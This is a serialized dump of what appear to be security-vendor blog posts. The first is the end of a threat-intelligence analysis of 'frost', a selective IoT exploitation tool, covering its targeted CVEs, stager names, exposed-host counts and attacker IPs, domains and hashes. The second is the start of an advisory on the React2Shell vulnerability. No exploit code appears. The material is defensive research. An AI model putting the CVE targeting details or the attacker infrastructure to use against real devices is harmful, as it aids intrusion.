Name",[336,24349,24350,24359,24368,24378,24388,24398,24408,24418,24428,24438,24451,24461,24471,24480,24490],{},[313,24351,24352,24357],{},[341,24353,24354],{"align":24087},[47,24355,23717],{"href":23715,"rel":24356},[51],[341,24358,24030],{"align":24087},[313,24360,24361,24366],{},[341,24362,24363],{"align":24087},[47,24364,24106],{"href":24104,"rel":24365},[51],[341,24367,24320],{"align":24087},[313,24369,24370,24375],{},[341,24371,24372],{"align":24087},[47,24373,24121],{"href":24119,"rel":24374},[51],[341,24376,24377],{"align":24087},"ipcam.goahead-rep.sh",[313,24379,24380,24385],{},[341,24381,24382],{"align":24087},[47,24383,24060],{"href":24058,"rel":24384},[51],[341,24386,24387],{"align":24087},"router.lblink-rep.sh",[313,24389,24390,24395],{},[341,24391,24392],{"align":24087},[47,24393,24149],{"href":24147,"rel":24394},[51],[341,24396,24397],{"align":24087},"router.aitemi-rep.sh",[313,24399,24400,24405],{},[341,24401,24402],{"align":24087},[47,24403,24163],{"href":24161,"rel":24404},[51],[341,24406,24407],{"align":24087},"router.totolink-rep.sh",[313,24409,24410,24415],{},[341,24411,24412],{"align":24087},[47,24413,24177],{"href":24175,"rel":24414},[51],[341,24416,24417],{"align":24087},"router.totolink2-rep.sh",[313,24419,24420,24425],{},[341,24421,24422],{"align":24087},[47,24423,24191],{"href":24189,"rel":24424},[51],[341,24426,24427],{"align":24087},"dvr.tvt-rep.sh",[313,24429,24430,24435],{},[341,24431,24432],{"align":24087},[47,24433,24206],{"href":24204,"rel":24434},[51],[341,24436,24437],{"align":24087},"router.tplink-rep.sh",[313,24439,24440,24448],{},[341,24441,24442,1246,24445],{"align":24087},[47,24443,24221],{"href":24219,"rel":24444},[51],[47,24446,24226],{"href":24224,"rel":24447},[51],[341,24449,24450],{"align":24087},"router.faith-rep.sh",[313,24452,24453,24458],{},[341,24454,24455],{"align":24087},[47,24456,24241],{"href":24239,"rel":24457},[51],[341,24459,24460],{"align":24087},"router.tenda-rep.sh",[313,24462,24463,24468],{},[341,24464,24465],{"align":24087},[47,24466,24256],{"href":24254,"rel":24467},[51],[341,24469,24470],{"align":24087},"dvr.tbk-rep.sh",[313,24472,24473,24478],{},[341,24474,24475],{"align":24087},[47,24476,24271],{"href":24269,"rel":24477},[51],[341,24479,24316],{"align":24087},[313,24481,24482,24487],{},[341,24483,24484],{"align":24087},[47,24485,24286],{"href":24284,"rel":24486},[51],[341,24488,24489],{"align":24087},"router.draytek-rep.sh",[313,24491,24492,24497],{},[341,24493,24494],{"align":24087},[47,24495,24301],{"href":24299,"rel":24496},[51],[341,24498,24499],{"align":24087},"router.dlink-rep.sh",[18,24501,24502,24503,24508,24509,24514],{},"This naming scheme allows us to query honeypot datasets such as ",[47,24504,24507],{"href":24505,"rel":24506},"https:\u002F\u002Fisc.sans.edu\u002Ffeeds_doc.html",[51],"SANS Web Honeypot Data"," for related activity. As of this writing, none of the stager names appear in the SANS ",[47,24510,24513],{"href":24511,"rel":24512},"https:\u002F\u002Fisc.sans.edu\u002Ffeeds\u002Furlsummary.txt",[51],"urlsummary.txt"," feed. This is consistent with the operator's behavior. The stagers are only delivered to targets that satisfy the match conditions, and some of our canaries fall into that category.",[18,24516,24517,24518,24520,24521,1246,24524,1246,24527,1255,24530,24533,24534,24537,24538,24541,24542,24547,24548,24550],{},"Beyond the stagers and match conditions, the vulnerability set itself is notable. Only four of the CVEs targeted by ",[886,24519,24043],{}," are included in the CISA Known Exploited Vulnerabilities catalog (",[47,24522,24241],{"href":24239,"rel":24523},[51],[47,24525,24301],{"href":24299,"rel":24526},[51],[47,24528,24206],{"href":24204,"rel":24529},[51],[47,24531,24286],{"href":24284,"rel":24532},[51],"). At the time of discovery, all but one appeared in the free ",[47,24535,1233],{"href":10806,"rel":24536},[51],". The remaining CVE, ",[47,24539,24060],{"href":24058,"rel":24540},[51],", is unusual because VulnCheck Exploit and Vulnerability Intelligence currently indexes only a single proof of concept for it, and that ",[47,24543,24546],{"href":24544,"rel":24545},"https:\u002F\u002Fnoisy-caravel-a9a.notion.site\u002FLBLINK_AC1900_V1-0-2_-set_blacklist-_-bs_SetMacBlack-_CI-179898c94eac802b9451fcb79aa668c3",[51],"PoC"," is a Notion document. No Nuclei template or Metasploit module exists for it, yet the implementation in ",[886,24549,24043],{}," matches the Notion document precisely.",[18,24552,24553,24554,24556],{},"The corresponding implementation inside ",[886,24555,24043],{}," is shown in the disassembly below.",[18,24558,24559],{},[68,24560],{"alt":24561,"src":24562},"CVE-2025-1610 implementation in frost","\u002Fblog\u002Ffrost-checks-first\u002Flblink-exploit.png",[18,24564,24565,24566,1246,24571,1246,24576,1246,24581,1246,24586,1246,24591,1246,24596,1246,24601,1246,24606,1246,24611,1246,24616,1246,24621,1246,24626,1246,24631,1246,24636,1246,24641,1246,24646,1246,24651,1255,24656,24661],{},"VulnCheck Exploit and Vulnerability Intelligence links the remaining CVEs to nineteen different botnets, including ",[47,24567,24570],{"href":24568,"rel":24569},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=IZ1H9",[51],"IZ1H9",[47,24572,24575],{"href":24573,"rel":24574},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Beastmode",[51],"Beastmode",[47,24577,24580],{"href":24578,"rel":24579},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=RustoBot",[51],"RustoBot",[47,24582,24585],{"href":24583,"rel":24584},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=RondoDox",[51],"RondoDox",[47,24587,24590],{"href":24588,"rel":24589},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Mirai",[51],"Mirai",[47,24592,24595],{"href":24593,"rel":24594},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=ShadowV2",[51],"ShadowV2",[47,24597,24600],{"href":24598,"rel":24599},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=AISURU",[51],"AISURU",[47,24602,24605],{"href":24603,"rel":24604},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Moobot",[51],"Moobot",[47,24607,24610],{"href":24608,"rel":24609},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gitpaste-12",[51],"Gitpaste-12",[47,24612,24615],{"href":24613,"rel":24614},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=BotenaGo",[51],"BotenaGo",[47,24617,24620],{"href":24618,"rel":24619},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Zerobot",[51],"Zerobot",[47,24622,24625],{"href":24623,"rel":24624},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gayfemboy",[51],"Gayfemboy",[47,24627,24630],{"href":24628,"rel":24629},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Ballista",[51],"Ballista",[47,24632,24635],{"href":24633,"rel":24634},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Skibidi",[51],"Skibidi",[47,24637,24640],{"href":24638,"rel":24639},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=XoRBot",[51],"XoRBot",[47,24642,24645],{"href":24643,"rel":24644},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Androxgh0st",[51],"Androxgh0st",[47,24647,24650],{"href":24648,"rel":24649},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Condi",[51],"Condi",[47,24652,24655],{"href":24653,"rel":24654},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=AGoent",[51],"AGoent",[47,24657,24660],{"href":24658,"rel":24659},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=Gafgyt",[51],"Gafgyt",". In other words, this operator is not working new or unexplored ground. They are using the same vulnerabilities that many other botnets rely on. Most of these CVEs are also not in the CISA KEV, which highlights how much active exploitation activity occurs outside that list.",[18,24663,10402,24664,24667,24668,24670],{},[47,24665,1251],{"href":1249,"rel":24666},[51]," data shows that the number of internet-exposed systems vulnerable to these bugs is small. Across the vulnerabilities we track, the global population is under ten thousand. This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player. It also highlights something interesting about this campaign. The ",[886,24669,24043],{}," binary does not contain the ICTBroadcast exploit that was used to deliver it in the first place, so the operator clearly has additional exploits in rotation that are not present in the sample. The table below breaks the population out by CVE.",[307,24672,24673,24684],{},[310,24674,24675],{},[313,24676,24677,24679,24681],{},[316,24678,319],{"align":24087},[316,24680,3581],{"align":24087},[316,24682,24683],{"align":24087},"IP Intel Count",[336,24685,24686,24699,24711,24723,24739,24751,24764,24775],{},[313,24687,24688,24693,24696],{},[341,24689,24690],{"align":24087},[47,24691,23717],{"href":23715,"rel":24692},[51],[341,24694,24695],{"align":24087},"ICTBroadcast",[341,24697,24698],{"align":24087},"10",[313,24700,24701,24706,24708],{},[341,24702,24703],{"align":24087},[47,24704,24149],{"href":24147,"rel":24705},[51],[341,24707,24152],{"align":24087},[341,24709,24710],{"align":24087},"195",[313,24712,24713,24718,24720],{},[341,24714,24715],{"align":24087},[47,24716,24206],{"href":24204,"rel":24717},[51],[341,24719,24209],{"align":24087},[341,24721,24722],{"align":24087},"5525",[313,24724,24725,24733,24736],{},[341,24726,24727,1246,24730],{"align":24087},[47,24728,24221],{"href":24219,"rel":24729},[51],[47,24731,24226],{"href":24224,"rel":24732},[51],[341,24734,24735],{"align":24087},"Four-Faith",[341,24737,24738],{"align":24087},"288",[313,24740,24741,24746,24748],{},[341,24742,24743],{"align":24087},[47,24744,24241],{"href":24239,"rel":24745},[51],[341,24747,24244],{"align":24087},[341,24749,24750],{"align":24087},"526",[313,24752,24753,24758,24761],{},[341,24754,24755],{"align":24087},[47,24756,24256],{"href":24254,"rel":24757},[51],[341,24759,24760],{"align":24087},"TBK",[341,24762,24763],{"align":24087},"937",[313,24765,24766,24771,24773],{},[341,24767,24768],{"align":24087},[47,24769,24271],{"href":24269,"rel":24770},[51],[341,24772,24274],{"align":24087},[341,24774,467],{"align":24087},[313,24776,24777,24782,24784],{},[341,24778,24779],{"align":24087},[47,24780,24286],{"href":24284,"rel":24781},[51],[341,24783,24289],{"align":24087},[341,24785,24786],{"align":24087},"362",[18,24788,24789],{},"With the victim side mapped out, we can look at the operator's footprint online.",[18,24791,24792,24793,24795,24796,24798,24799,1246,24802,1255,24805,24808,24809,24811],{},"The canary-observed activity originates from ",[886,24794,23135],{},". This host is launching the exploitation attempts and also serves the stager scripts and the ",[886,24797,24043],{}," binaries over HTTP on port 80. Inside the binary we see references to three domains that resolve to this same IP: ",[886,24800,24801],{},"krebs.strangled.net",[886,24803,24804],{},"mreow.jumpingcrab.com",[886,24806,24807],{},"xlab.ignorelist.com",". Shodan shows the host exposing additional exploit related behavior on TCP port 2, which matches what we see in our canaries and strongly suggests that ",[886,24810,23135],{}," is the operator's primary system.",[18,24813,24814],{},[68,24815],{"alt":24816,"src":24817},"Primary infra on Shodan","\u002Fblog\u002Ffrost-checks-first\u002Finfra1.png",[18,24819,24820,24821,24824,24825,24828,24829,59],{},"We also saw a second host, ",[886,24822,24823],{},"176.65.148.246",", that may be related. Shodan shows that host also using the same ",[886,24826,24827],{},"220 meow :3"," banner seen on the primary host, giving it a loose connection to the same operator. That link is slightly strengthened by similar exploit behavior reported in ",[47,24830,24833],{"href":24831,"rel":24832},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F176.65.148.246",[51],"AbuseIPDB",[18,24835,24836],{},[68,24837],{"alt":24838,"src":24839},"Possible infra on Shodan","\u002Fblog\u002Ffrost-checks-first\u002Finfra2.png",[18,24841,24842,24843,24846,24847,24849,24850,24854],{},"Taken together, the evidence points to a small, targeted operation. The vulnerable population is small, as shown by our ",[47,24844,1251],{"href":1249,"rel":24845},[51]," data, and the strict match conditions inside ",[886,24848,24043],{}," allow the operator to avoid most honeypots. The CVEs themselves are well-known. ",[47,24851,24853],{"href":1258,"rel":24852},[51],"VulnCheck Exploit & Vulnerability Intelligence"," associates them with numerous botnets, and while most do not appear in the CISA KEV, nearly all are included in the free VulnCheck KEV. Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here. Our canaries revealed this activity because they emulate the expected behavior of real systems.",[1920,24856,202],{"id":201},[18,24858,10768,24859,1246,24862,10775,24865,24868],{},[47,24860,283],{"href":281,"rel":24861},[51],[47,24863,216],{"href":1258,"rel":24864},[51],[47,24866,1251],{"href":1249,"rel":24867},[51]," datasets. The analysis in this blog draws directly on those capabilities: Canary Intelligence surfaced the selective exploitation behavior, EVI linked the CVEs to known botnets, and IP Intelligence identified the actual population of exposed hosts.",[18,24870,24871,24872,1246,24877,982,24882,59],{},"For more research like this check out our blogs, ",[1131,24873,24874],{},[47,24875,10793],{"href":10789,"rel":24876},[51],[1131,24878,24879],{},[47,24880,10801],{"href":10796,"rel":24881},[51],[1131,24883,24884],{},[47,24885,24026],{"href":24024,"rel":24886},[51],[18,24888,1228,24889,1234,24892,1240,24895,1246,24898,1246,24901,1255,24904,1260],{},[47,24890,1233],{"href":10806,"rel":24891},[51],[47,24893,1239],{"href":1237,"rel":24894},[51],[47,24896,1245],{"href":1243,"rel":24897},[51],[47,24899,1251],{"href":1249,"rel":24900},[51],[47,24902,283],{"href":281,"rel":24903},[51],[47,24905,216],{"href":1258,"rel":24906},[51],[1920,24908,24910],{"id":24909},"indicators","Indicators",[61,24912,23038],{"id":24913},"ip-addresses",[22,24915,24916,24921],{},[25,24917,24918,24920],{},[886,24919,23135],{}," - Scanning, exploitation, and hosting",[25,24922,24923,24925],{},[886,24924,24823],{}," - Potentially related scanning",[61,24927,24928],{"id":5931},"Domains",[22,24930,24931,24935,24939],{},[25,24932,24933],{},[886,24934,24801],{},[25,24936,24937],{},[886,24938,24804],{},[25,24940,24941],{},[886,24942,24807],{},[61,24944,24946],{"id":24945},"hashes-sha-1","Hashes (SHA-1)",[22,24948,24949,24957,24965,24973,24981,24989,24997,25005,25013],{},[25,24950,24951,24952],{},"frost.armv7: ",[47,24953,24956],{"href":24954,"rel":24955},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F3d9f01f9423cfa7912a40dc0f8eb6698a680573ede781881500dcbc7096b2d70\u002Fdetails",[51],"6e61651d0e2e3d13f769e05659cc2613f9a3a52a",[25,24958,24959,24960],{},"frost.armv6: ",[47,24961,24964],{"href":24962,"rel":24963},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fda34c6140760e0e3d2a4f37fedb444947d729e9d6ebd054f3929a46cf6fa35c8\u002Fdetails",[51],"c467e605b4c7c4a6a9aedda2cee63f6fa501e9cc",[25,24966,24967,24968],{},"frost.armv5: ",[47,24969,24972],{"href":24970,"rel":24971},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F6aec0b1719f05151fd630f7c8f4d5d5ff08c389b2d2738fe27341cd0fbb413af\u002Fdetails",[51],"cb112935934a8b32459adccab119391df480c75e",[25,24974,24975,24976],{},"frost.mips: ",[47,24977,24980],{"href":24978,"rel":24979},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fcb988ee37b049e1c665607a2e09ec3f8c24f9002b7981aea69fd04ef37d6b7ac\u002Fdetails",[51],"a7957d96f4d8c5e801106281e85afd889d369850",[25,24982,24983,24984],{},"frost.mipsel: ",[47,24985,24988],{"href":24986,"rel":24987},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F8d681c267e5ca2f16e65d6abc4db69d7b89a9c410ee17641df875115abe63c80\u002Fdetails",[51],"e6f9789322a55f721b8e8a21812912e0a3de6703",[25,24990,24991,24992],{},"frost.aarch64: ",[47,24993,24996],{"href":24994,"rel":24995},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F846ae4259d4b361d9c4687f19f5c0c341c89c75580f6331c38348a750ced728a\u002Fdetails",[51],"712d90530ad71f344199db3a0a9bea696db5cfae",[25,24998,24999,25000],{},"frost.armv7b: ",[47,25001,25004],{"href":25002,"rel":25003},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F9e4c07975a08955f2cb3cc4fbbea70b52f7052098311d50bb946ffd257921a85\u002Fdetails",[51],"d0725253dc39a57049ea48e2a8c9316b7ee5159e",[25,25006,25007,25008],{},"frost.x86: ",[47,25009,25012],{"href":25010,"rel":25011},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Ffd6556974a56cf76b2cb4b898109e62f3a35bb4f6b92b4bca3e5808d4b36a095\u002Fdetails",[51],"f0b6bdb895918e5b27eef96f4c77f11351875028",[25,25014,25015,25016],{},"frost.x86_64: ",[47,25017,25020],{"href":25018,"rel":25019},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fbb77b0a07a310a47af7ef0463f79ec19fd8aa6dbb887aa69e35f30bdc6346ece\u002Fdetails",[51],"b7b79f6b41b2cde4dad8a8b7269eea5e11d43751",[2901,25022,25023],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":25025},[25026,25027,25028],{"id":24913,"depth":220,"text":23038},{"id":5931,"depth":220,"text":24928},{"id":24945,"depth":220,"text":24946},"2025-12-04","New CVE-2025-2611 attacks led us to a selective exploitation tool named frost that only fires when targets match precise fingerprints. VulnCheck's Canary Intelligence, EVI, and IP Intel exposed the CVEs involved, the operator's infrastructure, and the internet-exposed systems they can reach.",{"slug":25032},"frost-checks-first","\u002Fblog\u002Ffrost-checks-first",{"title":20129,"description":25030},"blog\u002Ffrost-checks-first",[2941,242,1279,23275],"8YL7I02HqXSSX6KR2D8ZFrQ1IKNlkck43GRzQhUuPjs",{"id":25039,"title":25040,"articles":25041,"authors":25070,"body":25072,"date":25045,"description":25500,"extension":234,"image":7,"link":7,"meta":25501,"navigation":237,"path":25503,"seo":25504,"series":7,"stem":25505,"subtype":7,"tags":25506,"__hash__":25507},"blog\u002Fblog\u002Fcve-2025-55182-react-nextjs.md","Critical vulnerability in React and Next.js (CVE-2025-55182)",[25042,25046,25050,25054,25058,25061,25064,25067],{"title":25043,"source":11228,"link":25044,"date":25045},"Developers scramble as critical React flaw threatens major apps","https:\u002F\u002Fcyberscoop.com\u002Freact-server-vulnerability-critical-severity-security-update\u002F","2025-12-03",{"title":25047,"source":25048,"link":25049,"date":25029},"Act now! Aussie cyber agency issues urgent warning over critical React vulnerability","Cyber Daily","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12973-act-now-aussie-cyber-agency-issues-urgent-warning-over-critical-react-vulnerability",{"title":25051,"source":11228,"link":25052,"date":25053},"Attackers hit React defect as researchers quibble over proof","https:\u002F\u002Fcyberscoop.com\u002Fattackers-exploit-react-server-vulnerability\u002F","2025-12-05",{"title":25055,"source":14382,"link":25056,"date":25057},"Critical React2Shell Flaw Added to CISA KEV After Confirmed Active Exploitation","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fcritical-react2shell-flaw-added-to-cisa.html","2025-12-06",{"title":25059,"source":12157,"link":25060,"date":23681},"Risky Bulletin: APTs go after the React2Shell vulnerability within hours","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-apts-go-after-the-react2shell-vulnerability-within-hours\u002F",{"title":25062,"source":14382,"link":25063,"date":23681},"⚡ Weekly Recap: USB Malware, React2Shell, WhatsApp Worms, AI IDE Bugs & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fweekly-recap-usb-malware-react2shell.html",{"title":25065,"source":11218,"link":25066,"date":23681},"Exploitation Activity Ramps Up Against React2Shell","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fexploitation-activity-ramps-react2shell",{"title":25068,"source":23286,"link":25069,"date":22718},"Exploitation Efforts Against Critical React2Shell Flaw Accelerate","https:\u002F\u002Fsecurityboulevard.com\u002F2025\u002F12\u002Fexploitation-efforts-against-critical-react2shell-flaw-accelerate\u002F",[25071],{"name":256,"avatar":257,"link":258,"linkName":20001},{"type":15,"value":25073,"toc":25489},[25074,25118,25120,25133,25139,25143,25152,25164,25168,25176,25193,25215,25240,25243,25254,25271,25275,25278,25305,25312,25316,25319,25328,25344,25369,25402,25405,25411,25414,25418,25421,25455,25458,25460,25472],[22,25075,25076,25082,25085,25098],{},[25,25077,25078,25081],{},[47,25079,10533],{"href":10531,"rel":25080},[51],", also known as React2Shell, is a CVSS 10 remote code execution vulnerability in React Server Components and Next.js that was disclosed on December 3, 2025.",[25,25083,25084],{},"VulnCheck's research team has confirmed the vulnerability is exploitable for unauthenticated RCE in default Next.js apps, which are expected to be the main attack vector(s).",[25,25086,25087,25088,25092,25093,25097],{},"Multiple proof-of-concept RCE ",[47,25089,25091],{"href":22131,"rel":25090},[51],"exploits"," became publicly ",[47,25094,25096],{"href":22088,"rel":25095},[51],"available"," on December 4, at which time VulnCheck and others began seeing widespread opportunistic exploitation. VulnCheck's canary network has since detected thousands of exploit attempts.",[25,25099,25100,25101,25106,25107,1246,25112,25117],{},"On December 11, two additional ",[47,25102,25105],{"href":25103,"rel":25104},"https:\u002F\u002Freact.dev\u002Fblog\u002F2025\u002F12\u002F11\u002Fdenial-of-service-and-source-code-exposure-in-react-server-components",[51],"vulnerabilities"," were disclosed (",[47,25108,25111],{"href":25109,"rel":25110},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-55183",[51],"CVE-2025-55183",[47,25113,25116],{"href":25114,"rel":25115},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-55184",[51],"CVE-2025-55184",") in React Server Components; neither of these vulnerabilities results in remote code execution.",[61,25119,11273],{"id":11272},[18,25121,25122,25123,25126,25127,25132],{},"On December 3, 2025, React developers disclosed ",[47,25124,10533],{"href":10531,"rel":25125},[51],", an unauthenticated remote code execution vulnerability with a CVSS score of 10 that was reported to the vendor on November 29, only four days before it was fixed. CVE-2025-55182, nicknamed \"React2Shell,\" ultimately arises from an unsafe deserialization issue in React Server Components, specifically ",[47,25128,25131],{"href":25129,"rel":25130},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Fpull\u002F35277\u002Ffiles",[51],"React Flight",". When a server receives a specially crafted React Flight payload, the internal deserialization logic performs insufficient validation of its structure. By exploiting this weakness, an attacker can cause React to misinterpret attacker-controlled values as internal references or objects. This permits unintended server-side behaviors and can lead to the execution of server-privileged code paths within the React Server Components runtime.",[18,25134,25135],{},[68,25136],{":width":10862,"alt":25137,"src":25138},"NextJS CVE-2025-55182","blog\u002Fnextjs-cve-2025-55182\u002Fcve-2025-55182-console.png",[993,25140,25142],{"id":25141},"exploitation-in-the-wild","Exploitation in the wild",[18,25144,25145,25146,25151],{},"The vulnerability wasn't known to be exploited in the wild at time of disclosure but began seeing exploit attempts shortly after a public PoC was released on December 4. VulnCheck's Canary Intelligence network began detecting exploitative (malicious) scanning on December 4. Amazon has also reported seeing ",[47,25147,25150],{"href":25148,"rel":25149},"https:\u002F\u002Faws.amazon.com\u002Fblogs\u002Fsecurity\u002Fchina-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182\u002F",[51],"exploit attempts"," by China-nexus threat groups, including Earth Lamia and Jackpot Panda.",[18,25153,25154,25157,25158,25163],{},[295,25155,25156],{},"Saturday, December 6 update:"," VulnCheck's canaries are now seeing hundreds of exploit attempts. Broad, opportunistic scanning and exploitation are ongoing, and Vercel is ",[47,25159,25162],{"href":25160,"rel":25161},"https:\u002F\u002Fvercel.com\u002Fblog\u002Fresources-for-protecting-against-react2shell",[51],"offering"," large bounties for anyone who reports successful WAF bypasses.",[61,25165,25167],{"id":25166},"whats-affected","What’s affected?",[18,25169,25170,25171,25175],{},"Per the React team’s ",[47,25172,5359],{"href":25173,"rel":25174},"https:\u002F\u002Freact.dev\u002Fblog\u002F2025\u002F12\u002F03\u002Fcritical-security-vulnerability-in-react-server-components",[51],", the vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:",[22,25177,25178,25183,25188],{},[25,25179,25180],{},[886,25181,25182],{},"react-server-dom-webpack",[25,25184,25185],{},[886,25186,25187],{},"react-server-dom-parcel",[25,25189,25190],{},[886,25191,25192],{},"react-server-dom-turbopack",[18,25194,25195,25196,1246,25201,1255,25206,25211,25212],{},"The issue is fixed in versions ",[47,25197,25200],{"href":25198,"rel":25199},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.0.1",[51],"19.0.1",[47,25202,25205],{"href":25203,"rel":25204},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.1.2",[51],"19.1.2",[47,25207,25210],{"href":25208,"rel":25209},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.2.1",[51],"19.2.1"," of React. ",[295,25213,25214],{},"Fixes should be applied on an emergency basis, as widespread exploit attempts are likely.",[18,25216,25217,25218,1246,25221,1246,25223,1246,25225,1246,25228,1255,25231,25234,25235,25239],{},"Known affected React frameworks and bundlers are as follows, but note that this list is likely to grow: ",[886,25219,25220],{},"next",[886,25222,21356],{},[886,25224,21430],{},[886,25226,25227],{},"@parcel\u002Frsc",[886,25229,25230],{},"@vitejs\u002Fplugin-rsc",[886,25232,25233],{},"rwsdk",". See the ",[47,25236,25238],{"href":25173,"rel":25237},[51],"React blog"," for the latest information on affected frameworks and components.",[18,25241,25242],{},"The React blog explicitly notes that (emphasis ours):",[1925,25244,25245],{},[18,25246,25247,25248,25250,25251,25253],{},"If your app’s React code does not use a server, your app is ",[295,25249,6881],{}," affected by this vulnerability. If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is ",[295,25252,6881],{}," affected by this vulnerability.",[18,25255,25256,25257,25261,25262,25264,25265,25270],{},"The Next.js team similarly has a security bulletin 